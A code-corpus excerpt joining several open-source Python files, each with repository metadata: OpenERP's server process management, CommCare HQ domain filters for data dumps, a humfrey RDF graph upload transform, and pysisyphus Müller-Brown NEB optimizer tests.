super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.tools.config.options["addons_path"].split(','):
_logger.info('Watching addons folder %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
addons_path = openerp.tools.config.options["addons_path"].split(',')
for i in xml_files:
for path in addons_path:
if i.startswith(path):
                    # find out which addons path the file belongs to
                    # and extract its module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module]=1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s',i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the database used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT,signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
self.quit_signals_received += 1
def cron_thread(self, number):
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = openerp.modules.registry.RegistryManager.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.items():
while True and registry.ready:
acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
if not acquired:
break
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(openerp.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i)
t.setDaemon(True)
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e,s):
return self.app(e,s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
threading.Thread(target=self.http_thread).start()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.interface, self.port)
def start(self):
_logger.debug("Setting signal handlers")
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
elif os.name == 'nt':
import win32api
            win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)
self.cron_spawn()
self.http_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
self.httpd.shutdown()
self.close_socket(self.httpd.socket)
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id:
while thread.isAlive():
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
openerp.modules.registry.RegistryManager.delete_all()
logging.shutdown()
def run(self):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start()
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler.) The try/except is for the win32 case.
try:
while self.quit_signals_received == 0:
time.sleep(60)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def watch_parent(self, beat=4):
import gevent
ppid = os.getppid()
while True:
if ppid != os.getppid():
pid = os.getpid()
_logger.info("LongPolling (%s) Parent changed", pid)
# suicide !!
os.kill(pid, signal.SIGTERM)
return
gevent.sleep(beat)
def start(self):
import gevent
from gevent.wsgi import WSGIServer
if os.name == 'posix':
signal.signal(signal.SIGQUIT, dumpstacks)
gevent.spawn(self.watch_parent)
self.httpd = WSGIServer((self.interface, self.port), self.app)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
self.httpd.serve_forever()
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
    method between workers, but we plan to replace it with a more intelligent
    dispatcher that will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = (config['xmlrpc_interface'] or '0.0.0.0', config['xmlrpc_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], '.')
except IOError, e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv('--pidfile','--workers')
cmd = nargs[0]
cmd = os.path.join(os.path.dirname(cmd), "openerp-gevent")
nargs[0] = cmd
popen = subprocess.Popen(nargs)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid in self.workers:
_logger.debug("Worker (%s) unregistered",pid)
try:
self.workers_http.pop(pid,None)
self.workers_cron.pop(pid,None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError, e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT,signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
self.dumpstacks()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError, e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if (worker.watchdog_timeout is not None) and \
(now - worker.watchdog_time >= worker.watchdog_timeout):
_logger.error("Worker (%s) timeout", pid)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
if not self.long_polling_pid:
self.long_polling_spawn()
def sleep(self):
try:
# map of fd -> worker
fds = dict([(w.watchdog_pipe[0],w) for k,w in self.workers.items()])
fd_in = fds.keys() + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
try:
# empty pipe
while os.read(fd, 1):
pass
except OSError, e:
if e.errno not in [errno.EAGAIN]:
raise
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def start(self):
        # Empty the cursor pool, we don't want them to be shared among forked workers.
openerp.sql_db.close_all()
        # wakeup pipe, python doesn't throw EINTR when a syscall is interrupted
# by a signal simulating a pseudo SA_RESTART. We write to a pipe in the
# signal handler to overcome this behaviour
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
# listen to socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8*self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
self.worker_kill(self.long_polling_pid, signal.SIGKILL) # FIXME make longpolling process handle SIGTERM correctly
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
while self.workers and time.time() < limit:
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
self.socket.close()
def run(self):
self.start()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception,e:
_logger.exception(e)
self.stop(False)
sys.exit(-1)
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('openerp: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def sleep(self):
try:
ret = select.select([self.multi.socket], [], [], self.multi.beat)
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def process_limit(self):
        # If our parent changed, commit suicide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
rss, vms = memory_info(psutil.Process(os.getpid()))
if vms > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
self.alive = False # Commit suicide after the request.
# VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))
# SIGXCPU (exceeded CPU time) signal handler will raise an exception.
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
def time_expired(n, stack):
            _logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
            # We don't commit suicide in this case
raise Exception('CPU time limit exceeded.')
signal.signal(signal.SIGXCPU, time_expired)
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
        # Prevent fd inheritance: set close_on_exec
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
def stop(self):
pass
def run(self):
try:
self.start()
while self.alive:
self.process_limit()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
self.process_work()
_logger.info("Worker (%s) exiting. request_count: %s.", self.pid, self.request_count)
self.stop()
except Exception,e:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def process_request(self, client, addr):
client.setblocking(1)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        # Prevent fd inheritance: set close_on_exec
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
# receiving the full reply
try:
self.server.process_request(client,addr)
except IOError, e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error, e:
if e[0] not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
# process_work() below process a single database per call.
# The variable db_index is keeping track of the next database to
# process.
self.db_index = 0
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
time.sleep(interval)
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = openerp.service.db.exp_list(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('openerp.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_rss, start_vms = memory_info(psutil.Process(os.getpid()))
import openerp.addons.base as base
base.ir.ir_cron.ir_cron._acquire_job(db_name)
openerp.modules.registry.RegistryManager.delete(db_name)
            # don't keep cursors in multi-database mode
if len(db_names) > 1:
openerp.sql_db.close_db(db_name)
if rpc_request_flag:
end_time = time.time()
end_rss, end_vms = memory_info(psutil.Process(os.getpid()))
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % (db_name, end_time - start_time, start_vms / 1024, end_vms / 1024, (end_vms - start_vms)/1024)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
                _logger.error("There are more databases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
self.multi.socket.close()
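# Hedged sketch (not in the original module): the round-robin index that
# WorkerCron.process_work() uses to visit one database per call, isolated as a
# plain function.  WorkerCron.sleep() above only waits for the full interval
# once the index has wrapped back to 0, i.e. after a complete pass.
def _next_cron_db(db_index, db_names):
    if not db_names:
        return 0, None
    db_index = (db_index + 1) % len(db_names)
    return db_index, db_names[db_index]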
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
for m in openerp.conf.server_wide_modules:
try:
openerp.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if openerp.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
os.execv(sys.executable, args)
def start():
""" Start the openerp http server and cron processor.
"""
global server
load_server_wide_modules()
if config['workers']:
server = PreforkServer(openerp.service.wsgi_server.application)
elif openerp.evented:
server = GeventServer(openerp.service.wsgi_server.application)
else:
server = ThreadedServer(openerp.service.wsgi_server.application)
if config['auto_reload']:
autoreload = AutoReload(server)
autoreload.run()
server.run()
# like the legend of the phoenix, all ends with beginnings
if getattr(openerp, 'phoenix', False):
modules = []
if config['auto_reload']:
modules = autoreload.modules.keys()
_reexec(modules)
sys.exit(0)
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
trabacus-softapps/openerp-8.0-cc
|
openerp/service/server.py
|
Python
|
agpl-3.0
| 32,015 | 0.003155 |
from abc import ABCMeta, abstractmethod
import six
from django.db.models import Q
from dimagi.utils.chunked import chunked
class DomainFilter(six.with_metaclass(ABCMeta)):
@abstractmethod
def get_filters(self, domain_name):
"""Return a list of filters. Each filter will be applied to a queryset independently
of the others."""
raise NotImplementedError()
class SimpleFilter(DomainFilter):
def __init__(self, filter_kwarg):
self.filter_kwarg = filter_kwarg
def get_filters(self, domain_name):
return [Q(**{self.filter_kwarg: domain_name})]
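# Hedged sketch (not part of the original module): how a DomainFilter is meant
# to be consumed.  Each Q object returned by get_filters() is applied to the
# queryset on its own, independently of the others; `queryset`, `domain_filter`
# and `domain_name` are placeholders supplied by the caller.
def iter_filtered_querysets(queryset, domain_filter, domain_name):
    for q_filter in domain_filter.get_filters(domain_name):
        yield queryset.filter(q_filter)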
class UsernameFilter(DomainFilter):
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 500 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_usernames_by_domain
usernames = get_all_usernames_by_domain(domain_name)
for chunk in chunked(usernames, 500):
filter = Q()
for username in chunk:
filter |= Q(username__iexact=username)
yield filter
class UserIDFilter(DomainFilter):
def __init__(self, user_id_field, include_web_users=True):
self.user_id_field = user_id_field
self.include_web_users = include_web_users
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 1000 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_user_ids_by_domain
user_ids = get_all_user_ids_by_domain(domain_name, include_web_users=self.include_web_users)
for chunk in chunked(user_ids, 1000):
query_kwarg = '{}__in'.format(self.user_id_field)
yield Q(**{query_kwarg: chunk})
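# Hedged sketch (not in the original module): the chunk-and-OR pattern shared by
# UsernameFilter and UserIDFilter, shown in isolation.  `field` and `values` are
# placeholders; the default chunk size mirrors the 500/1000 limits above, which
# keep each generated WHERE clause to a bounded number of terms.
def chunked_or_filters(field, values, chunk_size=500):
    for chunk in chunked(values, chunk_size):
        q_filter = Q()
        for value in chunk:
            q_filter |= Q(**{field: value})
        yield q_filter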
|
qedsoftware/commcare-hq
|
corehq/apps/dump_reload/sql/filters.py
|
Python
|
bsd-3-clause
| 1,812 | 0.002208 |
from __future__ import with_statement
import datetime
import logging
import pytz
import rdflib
from django.conf import settings
from humfrey.update.transform.base import Transform
from humfrey.update.uploader import Uploader
from humfrey.sparql.endpoint import Endpoint
from humfrey.utils.namespaces import NS
logger = logging.getLogger(__name__)
class Upload(Transform):
formats = {
'rdf': 'xml',
'n3': 'n3',
'ttl': 'n3',
'nt': 'nt',
}
created_query = """
SELECT ?date WHERE {
GRAPH %(graph)s {
%(graph)s dcterms:created ?date
}
}
"""
site_timezone = pytz.timezone(settings.TIME_ZONE)
def __init__(self, graph_name, method='PUT'):
self.graph_name = rdflib.URIRef(graph_name)
self.method = method
def execute(self, transform_manager, input):
transform_manager.start(self, [input])
logger.debug("Starting upload of %r", input)
extension = input.rsplit('.', 1)[-1]
try:
serializer = self.formats[extension]
except KeyError:
logger.exception("Unrecognized RDF extension: %r", extension)
raise
graph = rdflib.ConjunctiveGraph()
graph.parse(open(input, 'r'),
format=serializer,
publicID=self.graph_name)
logger.debug("Parsed graph")
datetime_now = self.site_timezone.localize(datetime.datetime.now().replace(microsecond=0))
modified = graph.value(self.graph_name, NS['dcterms'].modified,
default=rdflib.Literal(datetime_now))
created = graph.value(self.graph_name, NS['dcterms'].created)
if not created:
logger.debug("Getting created date from %r", transform_manager.store.query_endpoint)
endpoint = Endpoint(transform_manager.store.query_endpoint)
results = list(endpoint.query(self.created_query % {'graph': self.graph_name.n3()}))
if results:
created = results[0].date
else:
created = modified
graph += (
(self.graph_name, NS.rdf.type, NS.sd.Graph),
(self.graph_name, NS.dcterms.modified, modified),
(self.graph_name, NS.dcterms.created, created),
)
logger.debug("About to serialize")
output = transform_manager('rdf')
with open(output, 'w') as f:
graph.serialize(f)
logger.debug("Serialization done; about to upload")
uploader = Uploader()
uploader.upload(stores=(transform_manager.store,),
graph_name=self.graph_name,
filename=output,
method=self.method,
mimetype='application/rdf+xml')
logger.debug("Upload complete")
transform_manager.end([self.graph_name])
transform_manager.touched_graph(self.graph_name)
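# Hedged illustration (not part of the original transform): the provenance
# triples that execute() attaches before uploading, reduced to a standalone
# rdflib snippet.  The graph URI and timestamp are example values only.
def _provenance_sketch():
    graph_name = rdflib.URIRef('http://example.org/graph/example-dataset')
    graph = rdflib.ConjunctiveGraph()
    stamp = rdflib.Literal(datetime.datetime(2013, 1, 1, 12, 0, 0))
    graph += (
        (graph_name, NS.rdf.type, NS.sd.Graph),
        (graph_name, NS.dcterms.created, stamp),
        (graph_name, NS.dcterms.modified, stamp),
    )
    return graph.serialize(format='xml')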
|
ox-it/humfrey
|
humfrey/update/transform/upload.py
|
Python
|
bsd-3-clause
| 2,982 | 0.001341 |
#!/usr/bin/env python3
import copy
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pysisyphus.plotters.AnimPlot import AnimPlot
from pysisyphus.calculators.MullerBrownPot import MullerBrownPot
#from pysisyphus.calculators.MullerBrownSympyPot import MullerBrownPot
from pysisyphus.cos.NEB import NEB
from pysisyphus.cos.SimpleZTS import SimpleZTS
from pysisyphus.optimizers.FIRE import FIRE
from pysisyphus.optimizers.BFGS import BFGS
from pysisyphus.optimizers.LBFGS import LBFGS
from pysisyphus.Geometry import Geometry
from pysisyphus.optimizers.SteepestDescent import SteepestDescent
KWARGS = {
"images": 4,
"max_cycles": 100,
"max_step": 0.02,
"convergence": {
"max_force_thresh": 0.1,
"rms_force_thresh": 0.02,
"max_step_thresh": 0.005,
"rms_step_thresh": 0.001,
},
"dump": False,
}
def get_geoms(keys=("B","C","TSA","A")):
coords_dict = {
"A": (-0.558, 1.442, 0), # Minimum A
"B": (0.6215, 0.02838, 0), # Minimum B
"C": (-0.05, 0.467, 0), # Minimum C
"AC": (-0.57, 0.8, 0), # Between A and C
"TSA": (-0.822, 0.624, 0) # Saddle point A
}
coords = [np.array(coords_dict[k]) for k in keys]
    atoms = ("H", )
geoms = [Geometry(atoms, c) for c in coords]
return geoms
def run_cos_opt(cos, Opt, images, **kwargs):
cos.interpolate(images)
opt = Opt(cos, **kwargs)
for img in cos.images:
img.set_calculator(MullerBrownPot())
opt.run()
return opt
def animate(opt):
xlim = (-1.75, 1.25)
ylim = (-0.5, 2.25)
levels=(-150, -15, 40)
ap = AnimPlot(MullerBrownPot(), opt, xlim=xlim, ylim=ylim, levels=levels)
ap.animate()
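# Hedged sketch (not one of the original tests, and not collected by pytest):
# the smallest end-to-end use of the helpers above -- a NEB between minima B
# and A optimized with steepest descent, driven by the shared KWARGS just like
# the tests below.
def example_neb_run():
    kwargs = copy.copy(KWARGS)
    neb = NEB(get_geoms(("B", "A")))
    return run_cos_opt(neb, SteepestDescent, **kwargs)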
@pytest.mark.sd
def test_steepest_descent_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 4
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 56)
return opt
@pytest.mark.sd
def test_steepest_descent_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_cycles"] = 100
convergence = {
"max_force_thresh": 1.16,
"rms_force_thresh": 0.27,
"max_step_thresh": 0.021,
"rms_step_thresh": 0.005,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 62)
return opt
@pytest.mark.bfgs
def test_bfgs_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"max_force_thresh": 5.0,
"rms_force_thresh": 1,
"max_step_thresh": 0.002,
"rms_step_thresh": 0.0006,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, BFGS, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 45)
return opt
@pytest.mark.lbfgs
def test_lbfgs_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 3
kwargs["fix_ends"] = True
k_min = 1000
k_max = k_min+10
neb = NEB(get_geoms(("A", "B")), k_min=k_min, k_max=k_max, fix_ends=True)
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
# from pysisyphus.optimizers.LBFGS_mod import LBFGS
opt = run_cos_opt(neb, LBFGS, **kwargs)
# assert(opt.is_converged)
# assert(opt.cur_cycle == 45)
return opt
@pytest.mark.sd
def test_steepest_descent_neb_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"max_force_thresh": 0.6,
"rms_force_thresh": 0.13,
"max_step_thresh": 0.015,
"rms_step_thresh": 0.0033,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 41)
return opt
@pytest.mark.fire
def test_fire_neb():
kwargs = copy.copy(KWARGS)
kwargs["dt"] = 0.01
kwargs["dt_max"] = 0.1
neb = NEB(get_geoms())
opt = run_cos_opt(neb, FIRE, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 76)
return opt
def test_equal_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
